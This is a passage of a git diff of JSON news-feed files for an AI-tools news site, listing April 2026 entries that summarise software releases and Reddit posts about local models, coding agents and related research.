"https://reddit.com/r/ChatGPT/comments/1sljafu/how_to_make_codex_or_any_agent_do_your_work/", - "source": "Reddit r/ChatGPT", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-14T19:43:41.000Z", - "summary": "Hiii - here is a simple demo of how AgentHandover watches my screen and then instructs AI agent to do it like me without me explaining. \n\nAgentHandover watches how you work on your Mac, turns your workflows into reusable Skills, and lets agents like Codex, OpenClaw, etc. can execute them the way you do it by just typing /ah-skill-name and watch it do the magic.\n\nEach Skill captures the what, the why, and the how - steps, strategy, decision logic, guardrails, and your writing voice. And they're s", - "category": "ai_tools" - }, - { - "title": "pnpm v10.33.0 released", - "url": "https://github.com/pnpm/pnpm/releases/tag/v10.33.0", - "source": "GitHub Releases · pnpm", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.99, - "date": "2026-03-24T16:47:01.000Z", - "summary": "## Minor Changes\r\n\r\n* Added a new `dedupePeers` setting that reduces peer dependency duplication. When enabled, peer dependency suffixes use version-only identifiers (`name@version`) instead of full dep paths, eliminating nested suffixes like `(foo@1.0.0(bar@2.0.0))`. This dramatically reduces the number of package instances in projects with many recursive peer dependencies [#11070](https://github.com/pnpm/pnpm/issues/11070).\r\n\r\n## Patch Changes\r\n\r\n* Fail on incompatible lockfiles in CI when", - "category": "ai_tools" - }, - { - "title": "Gemini CLI v0.37.2 released", - "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.37.2", - "source": "GitHub Releases · Gemini CLI", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.9199999999999999, - "date": "2026-04-13T20:19:57.000Z", - "summary": "## What's Changed\n* fix(patch): cherry-pick 9d741ab to release/v0.37.1-pr-24565 to patch version v0.37.1 and create version 0.37.2 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25322\n\n\n**Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.37.1...v0.37.2", - "category": "ai_tools" - }, - { - "title": "Turbo v2.9.6 released", - "url": "https://github.com/vercel/turborepo/releases/tag/v2.9.6", - "source": "GitHub Releases · Turbo", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 0.9199999999999999, - "date": "2026-04-10T13:23:09.000Z", - "summary": "\n\n## What's Changed\n### create-turbo\n* chore: Update dependencies found in audits by @anthonyshew in https://github.com/vercel/turborepo/pull/12586\n### Examples\n* fix: Add missing `@types/node` to `with-svelte` example apps by @anthonyshew in https://github.com/vercel/turborepo/pull/12585\n### Changelog\n* docs: Add Bun equivalent for updating dependencies by @anthonyshew in https://github.com/vercel/turborepo/pul", - "category": "ai_tools" - }, - { - "title": "We're all building on top of something that changes under us every week, and nobody has a plan for that", - "url": "https://reddit.com/r/ClaudeAI/comments/1sl3yzt/were_all_building_on_top_of_something_that/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 0.9, - "date": "2026-04-14T09:46:57.000Z", - "summary": "I've been using Claude (Pro, now Max) for about 7 months, primarily for building and shipping small tools and automations for clients. I'm not complaining about Claude itself here , this is about a pattern I'm noticing across the entire AI tooling ecosystem that I think deserves a real conversation.\n\nEvery week, something changes. A model gets updated and suddenly the same prompt that worked reliably for two months produces different output. An API response structure shifts slightly. A feature g", - "category": "ai_tools" - }, - { - "title": "Vercel CLI vercel@51.2.1 released", - "url": "https://github.com/vercel/vercel/releases/tag/vercel%4051.2.1", - "source": "GitHub Releases · Vercel CLI", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 0.84, - "date": "2026-04-14T07:15:49.000Z", - "summary": "### Patch Changes\n\n- Add `ai-gateway api-keys create` command for creating AI Gateway API keys with optional quota limits ([#15744](https://github.com/vercel/vercel/pull/15744))\n\n- Improve `vercel blob list-stores` with `--json` and `--no-projects`, exclude non-blob stores when the API returns a `type` field, and show a richer table for non-TTY output while keeping linked-project filtering, `--all`, and interactive store selection on TTY. ([#14653](https://github.com/vercel/vercel/pull/14653", - "category": "ai_tools" - }, - { - "title": "Gemini CLI v0.38.0 released", - "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.0", - "source": "GitHub Releases · Gemini CLI", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-04-14T23:21:55.000Z", - "summary": "## What's Changed\n* fix(cli): refresh slash command list after /skills reload by @NTaylorMullen in https://github.com/google-gemini/gemini-cli/pull/24454\n* Update README.md for links. by @g-samroberts in https://github.com/google-gemini/gemini-cli/pull/22759\n* fix(core): ensure complete_task tool calls are recorded in chat history by @abhipatel12 in https://github.com/google-gemini/gemini-cli/pull/24437\n* feat(policy): explicitly allow web_fetch in plan mode with ask_user by @Adib234 in https://", - "category": "ai_tools" - }, - { - "title": "My first impressions of Minimax M2.7 (Q5_K_M) vs Qwen 3.5 27b (Q8_0)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1slm3si/my_first_impressions_of_minimax_m27_q5_k_m_vs/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-14T21:25:57.000Z", - "summary": "I'm not sure if the AesSedai's Q5\\_K\\_M version of Minimax M2.7 is too much lobotomized or if the model itself is kind of weak. \n \nI did a simple experiment with both models running with the recommended parameters. The task was simply to generate some [AGENTS.md](http://AGENTS.md) files for a Python/Fast API/LangGraph project of mine (Roo Code /init command), which has some degree of complexity. \n \nMinimax runs painfully slowly on my setup, so I was expecting it to demolish Qwen 3.5... but", - "category": "ai_models" - }, - { - "title": "Refusal in open-weights models looks like a sparse gate -> amplifier circuit, and generalizes across 12 models from 6 labs (2B-72B)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sllajh/refusal_in_openweights_models_looks_like_a_sparse/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-14T20:55:57.000Z", - "summary": "Paper: [https://arxiv.org/abs/2604.04385](https://arxiv.org/abs/2604.04385)\n\nI've been trying to understand where refusal actually lives. How it works mechanistically. Arditi et al showed refusal can be steered with a single direction. What I looked at here is the mechanistic question: what circuit creates and amplifies that direction?\n\nMain result: Across 12 models from 6 labs, I keep finding a sparse **gate-amplifier** pattern.\n\nA mid-layer 'gate' attention head reads a detection-layer represe", - "category": "ai_models" - }, - { - "title": "Tencent HY-World 2.0 appears to be dropping on April 15 — open-source multimodal 3D world generation from Tencent Hunyuan", - "url": "https://reddit.com/r/StableDiffusion/comments/1sll638/tencent_hyworld_20_appears_to_be_dropping_on/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-14T20:51:17.000Z", - "summary": "Tencent’s Hunyuan team is apparently releasing **HY-World 2.0 tomorrow**, according to a teaser post from Tengfei Wang (Tencent Hunyuan): “Launching tomorrow — Tencent #HYWorld 2.0, an engine-ready World Model\" [Source](https://x.com/DylanTFWang/status/2043952886166761519)\n\nThe launch page is already live, and this looks like a major upgrade over HY-World 1.5 / WorldPlay.\n\n## What HY-World 2.0 does\n\nHY-World 2.0 is a multimodal world model that can generate persistent, explorable 3D environments", - "category": "creative_tools" - }, - { - "title": "Updated Minimax m2.7 still doesn't allow coding a product. But before the next riot starts, Ryan Lee has already confirmed that they are still working on the license, and sale of products built by m2.7 is permitted.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1slkjqp/updated_minimax_m27_still_doesnt_allow_coding_a/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-14T20:28:09.000Z", - "summary": "Reddit r/LocalLLaMA — 9 upvotes, 14 comments", - "category": "ai_models" - }, - { - "title": "2x Asus Ascent GX10 - MiniMax M2.7 AWQ - cloud providers are dead to me", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sli7xr/2x_asus_ascent_gx10_minimax_m27_awq_cloud/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-14T19:05:55.000Z", - "summary": "Hello,\n\nI've been on a quest to get something \"close enough\" of Opus 4.5 running locally, for agentic coding, as SWE with 15 years of experience.\n\nI tried with one spark (yeah I'm calling my Asus Ascent GX10 sparks - they're the same), with models like Qwen 3.5 122B-A10B, Qwen3-Coder-Next, M2.5-REAP, ... Nothing was scratching the itch, too much frustration. 128GB is simply not enough (for me) right now.\n\nSo I bought a second one (first one I paid 2800€, second one 2500€, plus 60€ cable - total ", - "category": "ai_models" - }, - { - "title": "Parisians: we're running an open source AI art hackathon with LTX + NVIDIA this Saturday", - "url": "https://reddit.com/r/StableDiffusion/comments/1slgzja/parisians_were_running_an_open_source_ai_art/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-14T18:22:37.000Z", - "summary": "Hack and train on H100s for a day w/ people from the open source community + reserachers. Full details [here](https://ados.events/hackathon)", - "category": "creative_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-15.json b/data/news-feed-2026-04-15.json deleted file mode 100644 index bcef349..0000000 --- a/data/news-feed-2026-04-15.json +++ /dev/null @@ -1,255 +0,0 @@ -{ - "generated": "2026-06-05T00:44:34.272Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-15", - "article_count": 15, - "archived_story_count": 418, - "articles": [ - { - "title": "Qwen Code v0.14.5 released", - "url": "https://github.com/QwenLM/qwen-code/releases/tag/v0.14.5", - "source": "GitHub Releases · Qwen Code", - "tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-15T15:33:06.000Z", - "summary": "## What's Changed\n* feat(cli/sdk): expose /context usage data in non-interactive mode and SDK API by @wenshao in https://github.com/QwenLM/qwen-code/pull/2916\n* feat(cli): add startup performance profiler by @doudouOUC in https://github.com/QwenLM/qwen-code/pull/3232\n* feat(core): implement fork subagent for context sharing by @wenshao in https://github.com/QwenLM/qwen-code/pull/2936\n* feat(vscode-ide-companion): add /account for account display by @qqqys in https://github.com/QwenLM/qwen-code/p", - "category": "ai_tools" - }, - { - "title": "MCP vs API?", - "url": "https://reddit.com/r/ClaudeAI/comments/1slr3qj/mcp_vs_api/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-15T00:52:13.000Z", - "summary": "I am trying to get deeper into utilizing Claude Code (trying to become more technical) as I have recently switched to the terminal and wanted some feedback on better understanding MCP vs APIs. \n \nTo me it seems like APIs are direct instructions on how to navigate and pull or push data between a product and another entity. MCP on the other hand seems like it is allowing the AI to dynamically use tools and definitions based on your current context.\n\nI have heard a lot of people say that API is ", - "category": "ai_tools" - }, - { - "title": "Built a Visual Studio Code extension to use OpenCode as a GUI sidebar instead of the terminal", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sml59n/built_a_visual_studio_code_extension_to_use/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-15T22:28:23.000Z", - "summary": "Hey everyone,\n\nI built a VS Code extension that brings OpenCode directly into your sidebar as a native panel, that uses the UI elements exactly as they are from the OpenCode Desktop app. No terminal needed, no browser tab. It just lives in your activity bar and works easily.\n\nWhat it does:\n\n* Runs OpenCode sessions inside a VS Code webview sidebar\n* Automatically uses whatever workspace folder you have open\n* Can auto-start a local OpenCode server when you open the sidebar\n* Keeps your session a", - "category": "ai_models" - }, - { - "title": "Open Ai Agent Dashboard for Monitoring, Memory, Performance and Audit Trail", - "url": "https://reddit.com/r/ChatGPT/comments/1sm2bkg/open_ai_agent_dashboard_for_monitoring_memory/", - "source": "Reddit r/ChatGPT", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-15T10:39:22.000Z", - "summary": "Been building AI agents for about a year now and the thing that always drove me crazy is you deploy an agent, it runs for hours, and you have absolutely no idea what it did. The logs say \"task complete\" 47 times but did it actually do 47 different things or did it just loop the same task over and over?\n\nI had an agent burn through about $340 in API credits over a weekend because it got stuck retrying the same request. The logs showed 200 OK on every call. Everything looked fine. It just kept doi", - "category": "ai_tools" - }, - { - "title": "[P] Added 8 Indian languages to Chatterbox TTS via LoRA — 1.4% of parameters, no phoneme engineering [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1sltun8/p_added_8_indian_languages_to_chatterbox_tts_via/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-15T02:55:46.000Z", - "summary": "TL;DR: \nFine-tuned Chatterbox-Multilingual (Resemble AI's open-source TTS) to support Telugu, Kannada, Bengali, Tamil, Malayalam, Marathi, Gujarati, and Hindi using LoRA adapters + tokenizer extension. Only 7.8M / 544M parameters trained. Model + audio samples available.\n\n\\---\n\nThe Problem\n\nChatterbox-Multilingual supports 23 languages with zero-shot voice cloning, but no Dravidian languages (Telugu, Kannada, Tamil, Malayalam) and limited Indo-Aryan coverage beyond Hindi. That's 500M+ speakers ", - "category": "ai_research" - }, - { - "title": "Claude Code on desktop, redesigned for parallel agentic work.", - "url": "https://reddit.com/r/ClaudeAI/comments/1slictc/claude_code_on_desktop_redesigned_for_parallel/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.99, - "date": "2026-04-14T19:10:50.000Z", - "summary": "New sidebar for parallel sessions. Drag-and-drop layout. Integrated terminal. Run multiple agents from one window. \n\nNew tools make it easier to complete work without leaving the app.\n\nIntegrated terminal, in-app file editing, HTML + PDF preview, and a rebuilt diff viewer. Drag any panel into the layout that fits how you work. Three view modes when you want more (or less) signal.\n\nPlus more updates and customizations to fit how you work including SSH for Mac, keyboard shortcuts, and CLI plugin p", - "category": "ai_tools" - }, - { - "title": "I built a CLI that scans your project and auto-installs matching skills for Claude Code", - "url": "https://reddit.com/r/ClaudeAI/comments/1sm4at4/i_built_a_cli_that_scans_your_project_and/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.96, - "date": "2026-04-15T12:13:27.000Z", - "summary": "Hey r/ClaudeAI — I built a small tool to fix something that bugged me: every time I start a new project, picking the right skills from [skills.sh](http://skills.sh) is manual and slow.\n\n\n\nskillgrab does this:\n\n\n\n1. Scans \\`package.json\\`, \\`requirements.txt\\`, \\`pubspec.yaml\\`, \\`go.mod\\`, \\`Dockerfile\\`, \\`vercel.json\\`, etc. to detect your stack\n\n2. Reads your README for non-code hints (\"landing page\", \"pricing\", \"SEO\") and asks if you want marketing/design/sales skills\n\n3. Queries [skills.sh]", - "category": "ai_tools" - }, - { - "title": "Gemini CLI v0.38.1 released", - "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.1", - "source": "GitHub Releases · Gemini CLI", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.9199999999999999, - "date": "2026-04-15T17:56:33.000Z", - "summary": "## What's Changed\n* fix(patch): cherry-pick 050c303 to release/v0.38.0-pr-25317 to patch version v0.38.0 and create version 0.38.1 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25466\n\n\n**Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.38.0...v0.38.1", - "category": "ai_tools" - }, - { - "title": "MidJourney V8.1 Alpha Has Just Been Released. How Much Improvement Does It Have?", - "url": "https://reddit.com/r/midjourney/comments/1smlk07/midjourney_v81_alpha_has_just_been_released_how/", - "source": "Reddit r/midjourney", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-15T22:45:01.000Z", - "summary": "A new r/midjourney version always creates excitement. Beautiful sample images start appearing everywhere, people begin testing it immediately, and the usual question follows:\n\n**Is it really better, or is it just new?**\n\nWith MidJourney V8.1 Alpha now available, I wanted to look beyond the hype and test it in a more practical way.\n\nInstead of judging it in isolation, I compared it against two other strong image models available today: **Nano Banana 2** and **Grok Imagine 1.0.**\n\nThe goal was sim", - "category": "creative_tools" - }, - { - "title": "Great news, everyone. If you were sick of the condescending 5.2 model, creators have announced 5.3, with a less preachy tone. I have tested it over the last few days and it has become more balanced.", - "url": "https://reddit.com/r/ChatGPT/comments/1smkzda/great_news_everyone_if_you_were_sick_of_the/", - "source": "Reddit r/ChatGPT", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-15T22:21:37.000Z", - "summary": "I noticed a change from the condescending, sometimes rude and persistent looping behaviour of ChatGPT 5.2, so I asked Google about it and got this confirmation back that in March they updated to 5.3. I think I'm starting to receive that model now because it's become less preachy and isn't looping into psychoanalysis of me every time I talk to it.\n\n\n\nChatGPT has likely felt \"nicer\" recently due to several updates in early 2026 designed to improve its conversational tone and reduce the rigid, robo", - "category": "ai_tools" - }, - { - "title": "Qwen3.5 35b is sure still one the best local model (pulling above its weight) - More Details", - "url": "https://reddit.com/r/LocalLLaMA/comments/1smgqgy/qwen35_35b_is_sure_still_one_the_best_local_model/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-04-15T19:46:08.000Z", - "summary": "Last time I posted on how this model has performed in creating the webapp based on provided research paper. I got so much love to see people has appreciated the post and of-course the potential of this MOE model.\n\nI am sharing details on how I used this model to create webapp just using prompt and step by step guiding it. Later I converted my guidance steps into skills using same qwen-code cli with this model, that helped to add more examples.\n\nHere is github repo where I have added the [researc", - "category": "ai_models" - }, - { - "title": "Is it possible for an open-source AI that you run at home to become as powerful as that of chatgpt and others at that level?", - "url": "https://reddit.com/r/ChatGPT/comments/1smepps/is_it_possible_for_an_opensource_ai_that_you_run/", - "source": "Reddit r/ChatGPT", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-15T18:34:26.000Z", - "summary": "What would need to be true for someone to be able to run something that powerful entirely from home? Do they just need the correct weights? Assume that they don't need to do training (maybe some tech enthusiast does the training and just hands off the built model to people). Would storage space be a constraint? How much storage would they need? And how much RAM would they need? This is all for 1 person using it, not like the person would be serving an AI service out of their garage or something", - "category": "ai_tools" - }, - { - "title": "Lyra 2.0 : Explorable Generative 3D Worlds", - "url": "https://reddit.com/r/StableDiffusion/comments/1smbyjf/lyra_20_explorable_generative_3d_worlds/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-04-15T16:59:26.000Z", - "summary": "Nvidia released **Lyra 2.0**, a framework for generating persistent, explorable 3D worlds at scale, from NVIDIA Research. \n \nGenerating large-scale, complex environments is difficult for AI models. Current models often “forget” what spaces look like and lose track of movement over time, causing objects to shift, blur, or appear inconsistent. This prevents them from creating the reliable 3D environments required for downstream simulations. Lyra 2.0 solves these issues by: \n \n Maintaining per-", - "category": "creative_tools" - }, - { - "title": "[P] Built GPT-2, Llama 3, and DeepSeek from scratch in PyTorch - open source code + book", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sm82ze/p_built_gpt2_llama_3_and_deepseek_from_scratch_in/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-15T14:42:55.000Z", - "summary": "I wrote a book that implements modern LLM architectures from scratch. The part most relevant to this sub:\n\nChapter 3 takes GPT-2 and swaps exactly 4 things to get Llama 3.2-3B:\n\n1. LayerNorm → RMSNorm\n2. Learned positional encodings → RoPE\n3. GELU → SwiGLU\n4. Multi-Head Attention → Grouped-Query Attention\n\nThen loads Meta's real pretrained weights.\n\nChapter 5 builds DeepSeek's full architecture: MLA with the absorption trick, decoupled RoPE, MoE with shared experts and fine-grained segmentation,", - "category": "ai_models" - }, - { - "title": "Built GPT-2, Llama 3, and DeepSeek from scratch in PyTorch - open source code + book [p]", - "url": "https://reddit.com/r/MachineLearning/comments/1sm75yf/built_gpt2_llama_3_and_deepseek_from_scratch_in/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-15T14:08:23.000Z", - "summary": "I spent the past year implementing five LLM architectures from scratch in PyTorch and wrote a book documenting the process.\n\nWhat's covered:\n\n* Vanilla encoder-decoder transformer (English to Hindi translation)\n* GPT-2 (124M), loading real OpenAI pretrained weights\n* Llama 3.2-3B, showing the exact 4 component swaps from GPT-2 (RMSNorm, RoPE, SwiGLU, GQA), loading Meta's pretrained weights\n* KV cache mechanics, MQA, GQA\n* DeepSeek: Multi-Head Latent Attention with absorption trick and decoupled ", - "category": "ai_research" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-16.json b/data/news-feed-2026-04-16.json deleted file mode 100644 index 0a03285..0000000 --- a/data/news-feed-2026-04-16.json +++ /dev/null @@ -1,259 +0,0 @@ -{ - "generated": "2026-06-05T00:44:34.430Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-16", - "article_count": 15, - "archived_story_count": 396, - "articles": [ - { - "title": "Vercel CLI vercel@51.5.1 released", - "url": "https://github.com/vercel/vercel/releases/tag/vercel%4051.5.1", - "source": "GitHub Releases · Vercel CLI", - "tags": [ - "developer_tool", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "developer_tool", - "cli_tool", - "tool_update" - ], - "importance": 0.9199999999999999, - "date": "2026-04-16T20:37:28.000Z", - "summary": "### Patch Changes\n\n- Improve Claude Code Vercel plugin install and update prompts across CLI commands. ([#15921](https://github.com/vercel/vercel/pull/15921))\n\n- Updated dependencies \\[[`5219572d21a2ba4b49cc1c27d244c1ff5d76c591`](https://github.com/vercel/vercel/commit/5219572d21a2ba4b49cc1c27d244c1ff5d76c591), [`2babfa22946d80a92f1307a8d860a9039d695b09`](https://github.com/vercel/vercel/commit/2babfa22946d80a92f1307a8d860a9039d695b09), [`2babfa22946d80a92f1307a8d860a9039d695b09`](https://gi", - "category": "ai_tools" - }, - { - "title": "I got tired of copying/pasting between ChatGPT and X, so I built an extension that brings the AI directly into the timeline", - "url": "https://reddit.com/r/ChatGPT/comments/1snf7bl/i_got_tired_of_copyingpasting_between_chatgpt_and/", - "source": "Reddit r/ChatGPT", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-16T20:20:53.000Z", - "summary": "I use ChatGPT to help draft posts or brainstorm replies, but the workflow of copying tweets, pasting them into ChatGPT, asking it to reply, and then pasting it back into Twitter was driving me crazy. Also, it almost always sounds like a generic robot\n\nSo, I built **Tweetback**, a Chrome/Edge/Firefox extension that brings your API key directly into the X/Twitter interface.\n\nI wanted to see how far I could push the AI to actually understand context and sound human. Here is what it can do:\n\n**\"Clon", - "category": "ai_tools" - }, - { - "title": "anyone else notice labs are getting more secretive about their best models?", - "url": "https://reddit.com/r/ChatGPT/comments/1sn599k/anyone_else_notice_labs_are_getting_more/", - "source": "Reddit r/ChatGPT", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-04-16T14:31:54.000Z", - "summary": "something shifted recently and i can't stop thinking about it. the trend used to be: new model drops, blog post goes up, everyone gets access on day one. now it feels like the most capable stuff is quietly going behind walls with \"restricted access\" or gated research programs, while the public-facing releases are... fine, but clearly not the frontier.\n\ngoogle dropped gemma 4 open-weight and it's genuinely good — MoE architecture, strong reasoning, apache license. meta's doing multimodal reasonin", - "category": "ai_tools" - }, - { - "title": "Mozilla Announces \"Thunderbolt\" As An Open-Source, Enterprise AI Client", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sn4ibj/mozilla_announces_thunderbolt_as_an_opensource/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-04-16T14:04:23.000Z", - "summary": "Reddit r/LocalLLaMA — 4 upvotes, 3 comments", - "category": "ai_models" - }, - { - "title": "Qwen3.6-35B-A3B released!", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sn3izh/qwen3635ba3b_released/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-16T13:27:39.000Z", - "summary": "Meet Qwen3.6-35B-A3B:Now Open-Source!🚀🚀\n\nA sparse MoE model, 35B total params, 3B active. Apache 2.0 license.\n\n\\- Agentic coding on par with models 10x its active size\n\n\\- Strong multimodal perception and reasoning ability\n\n\\- Multimodal thinking + non-thinking modes\n\nEfficient. Powerful. Versatile. \n\nBlog:https://qwen.ai/blog?id=qwen3.6-35b-a3b\n\nQwen Studio:chat.qwen.ai\n\nHuggingFace:https://huggingface.co/Qwen/Qwen3.6-35B-A3B\n\nModelScope:https://modelscope.cn/models/Qwen/Qwen3.6-35B-A3B", - "category": "ai_models" - }, - { - "title": "Built a visual memory layer for Claude — see what Claude remembers about your projects (open source, free, WIP)", - "url": "https://reddit.com/r/ClaudeAI/comments/1smzaxb/built_a_visual_memory_layer_for_claude_see_what/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-04-16T10:13:13.000Z", - "summary": " Claude already has memory — but it's a black box. \n You can't see what it knows, what decisions were made, \n or how your project is progressing.\n \n Dendrite makes Claude's memory visible.\n \n How it works:\n - Claude writes structured memory slices via MCP \n (decisions, observations, tasks, open questions)\n - You see everything in a searchable 3-pane reader\n - Set your own preferences that Claude pulls from \n on every session\n - Track project progress, o", - "category": "ai_tools" - }, - { - "title": "Built an political benchmark for LLMs. KIMI K2 can't answer about Taiwan (Obviously). GPT-5.3 refuses 100% of questions when given an opt-out. [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1smqsbu/built_an_political_benchmark_for_llms_kimi_k2/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-04-16T02:31:24.000Z", - "summary": "I spent the few days building a benchmark that maps where frontier LLMs fall on a 2D political compass (economic left/right + social progressive/conservative) using 98 structured questions across 14 policy areas. I tested GPT-5.3, Claude Opus 4.6, and KIMI K2. The results are interesting.\n\n\n\n**The repo is fully open-source -- run it yourself on any model with an API:** \n[https://github.com/dannyyaou/llm-political-eval](https://github.com/dannyyaou/llm-political-eval)\n\n\n\n\n\n**The headline finding", - "category": "ai_research" - }, - { - "title": "Keycard – inject API keys into subprocesses, never touch shell env", - "url": "https://www.keycard.studio/", - "source": "Hacker News", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 0.97, - "date": "2026-04-16T01:37:49.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "I turned my MacBook notch into a live Claude Code dashboard", - "url": "https://reddit.com/r/ClaudeAI/comments/1smm0mo/i_turned_my_macbook_notch_into_a_live_claude_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 0.91, - "date": "2026-04-15T23:04:00.000Z", - "summary": "Notch Pilot lives in the MacBook notch (no menu bar icon, no dock icon) and shows:\n\n* Live 5-hour session % + weekly limits — the exact numbers from your Claude account page, pulled from the same oauth/usage endpoint Claude Code uses.\n* Permission prompts rendered inline — shell commands get a code block, file edits get a red/green diff, URLs get parsed. Deny / Allow / Always allow, with \"always allow\" writing to \\~/.claude/settings.json.\n* Every live session at a glance — project, model, uptime", - "category": "ai_tools" - }, - { - "title": "OpenClaw v2026.4.15 released", - "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.4.15", - "source": "GitHub Releases · OpenClaw", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.84, - "date": "2026-04-16T21:50:22.000Z", - "summary": "\n### Changes\n\n- Anthropic/models: default Anthropic selections, `opus` aliases, Claude CLI defaults, and bundled image understanding to Claude Opus 4.7.\n- Google/TTS: add Gemini text-to-speech support to the bundled `google` plugin, including provider registration, voice selection, WAV reply output, PCM telephony output, and setup/docs guidance. (#67515) Thanks @barronlroth.\n\n### Fixes\n\n- Agents/skills: sort prompt-facing `available_skills` entries by skill name after merging sources so `skills.", - "category": "ai_tools" - }, - { - "title": "Crush v0.59.0 released", - "url": "https://github.com/charmbracelet/crush/releases/tag/v0.59.0", - "source": "GitHub Releases · Crush", - 